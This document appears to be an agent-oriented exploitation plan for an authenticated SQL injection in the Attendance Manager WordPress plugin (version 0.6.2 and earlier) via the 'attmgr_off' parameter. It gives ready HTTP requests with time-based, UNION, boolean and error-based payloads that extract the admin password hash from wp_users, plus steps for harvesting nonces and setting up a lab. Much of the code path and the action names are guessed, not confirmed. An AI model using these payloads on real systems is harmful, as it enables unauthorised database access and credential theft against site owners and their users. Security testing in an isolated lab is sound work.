Attendance Manager <= 0.6.2 - Authenticated (Subscriber+) SQL Injection via 'attmgr_off' Parameter

This plan focuses on exploiting a SQL Injection vulnerability in the Attendance Manager plugin (version <= 0.6.2). The vulnerability resides in the handling of the attmgr_off parameter, which is used in a database query without proper sanitization or preparation.

1. Vulnerability Summary

• Vulnerability: SQL Injection (SQLi)
• Parameter: attmgr_off
• Condition: The plugin fails to use $wpdb->prepare() or integer casting for the attmgr_off parameter before interpolating it into a SQL query string.
• User Level: Authenticated (Subscriber and above).
• Impact: Attackers can extract sensitive information from the WordPress database, including user hashes, secret keys, and configuration data.

2. Attack Vector Analysis

• Endpoint: /wp-admin/admin-ajax.php
• Action: Likely an AJAX handler registered via wp_ajax_attmgr_... or wp_ajax_nopriv_attmgr_.... Based on the parameter name, it is likely related to retrieving attendance data or calendars.
• Vulnerable Parameter: attmgr_off (sent via POST or GET).
• Authentication: Required (Subscriber role).
• Preconditions: A user with at least Subscriber privileges must be logged in.

3. Code Flow (Inferred)

1. A user triggers an action (e.g., navigating a calendar or loading an attendance table) that sends an AJAX request to admin-ajax.php.
2. The action (e.g., attmgr_get_calendar) triggers a handler function in the plugin (e.g., attmgr_get_calendar_callback).
3. The handler retrieves the attmgr_off parameter from $_REQUEST['attmgr_off'] or $_POST['attmgr_off'].
4. The value is concatenated directly into a query string:
   $wpdb->get_results("SELECT ... WHERE ... LIMIT 10 OFFSET " . $_POST['attmgr_off']);
5. $wpdb->query or $wpdb->get_results executes the malicious SQL payload.

4. Nonce Acquisition Strategy

If the AJAX handler enforces a nonce check (e.g., check_ajax_referer or wp_verify_nonce), the agent must retrieve it from the frontend.

1. Identify Script Localization: Search for wp_localize_script in the plugin source to find the variable name.
   • Likely JS Object: attmgr_ajax (inferred)
   • Likely Nonce Key: nonce or attmgr_nonce (inferred)
2. Locate Triggering Page: The script is likely enqueued on pages displaying the attendance manager shortcode or admin dashboard.
   • Shortcode to check: [attendance_manager] or similar (search for add_shortcode in source).
3. Extraction Process:
   • Create a page containing the plugin's shortcode.
   • Navigate to the page as a Subscriber.
   • Execute: browser_eval("window.attmgr_ajax?.nonce") (Replace attmgr_ajax with the actual localized variable found).

5. Exploitation Strategy

The agent will use a Time-Based Blind SQL Injection to confirm the vulnerability and then proceed to data extraction if needed.

Step 1: Confirm Vulnerability (Time-Based)

HTTP Request:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: TARGET_HOST
Content-Type: application/x-www-form-urlencoded
Cookie: [Subscriber_Cookies]

action=[ACTION_NAME]&attmgr_off=1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)&nonce=[NONCE]

• Expected Result: The server response should be delayed by approximately 5 seconds.

Step 2: Extract Admin Password Hash

HTTP Request (Example):

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: TARGET_HOST
Content-Type: application/x-www-form-urlencoded
Cookie: [Subscriber_Cookies]

action=[ACTION_NAME]&attmgr_off=1 UNION SELECT 1,user_pass,3,4,5 FROM wp_users WHERE ID=1-- -&nonce=[NONCE]

(Note: The number of columns in the UNION must match the original query. The agent must first determine the column count using ORDER BY.)

6. Test Data Setup

1. Install Plugin: wp plugin install attendance-manager --version=0.6.2 --activate
2. Create Subscriber: wp user create victim victim@example.com --role=subscriber --user_pass=password123
3. Identify Action: Grep the plugin directory:
   • grep -rn "wp_ajax" .
   • grep -rn "attmgr_off" .
4. Create Page with Shortcode:
   • Find the shortcode: grep -rn "add_shortcode" .
   • wp post create --post_type=page --post_title="Attendance" --post_status=publish --post_content="[SHORTCODE_FOUND]"

7. Expected Results

• Confirmation: A successful SLEEP payload will result in a measurable HTTP response time delay.
• Data Leakage: If the endpoint returns data (e.g., JSON results), the UNION SELECT payload will cause the user_pass (hash) of the admin user to appear in the response body.

8. Verification Steps (Post-Exploit)

Confirm the database structure and the data that was targeted to ensure the exploit was accurate:

1. wp db query "SELECT user_login, user_pass FROM wp_users WHERE ID=1"
2. Compare the output hash with the data extracted via the AJAX endpoint.

9. Alternative Approaches

• Boolean-Based Blind: If time-based is unstable, use boolean logic:
  • attmgr_off=1 AND (SELECT 1 FROM wp_users WHERE ID=1 AND user_login='admin')
  • Compare response content or length between 1=1 and 1=2.
• Error-Based: Check if WP_DEBUG is on and use updatexml() or extractvalue():
  • attmgr_off=1 AND updatexml(1,concat(0x7e,(SELECT user_pass FROM wp_users LIMIT 1)),1)

10. Potential Action/Grep Targets (Actionable for Agent)

The agent should start by running:

# Find the AJAX actions
grep -r "wp_ajax" wp-content/plugins/attendance-manager/

# Find where the parameter is used
grep -r "attmgr_off" wp-content/plugins/attendance-manager/

# Identify the SQL sink
grep -rP "\$wpdb->(get_results|get_row|get_var|query).*attmgr_off" wp-content/plugins/attendance-manager/

Known structure (inferred):
The plugin often uses a class-based structure. Look for includes/class-attendance-manager.php or attendance-manager-ajax.php. The action is likely attmgr_get_events or attmgr_load_attendance.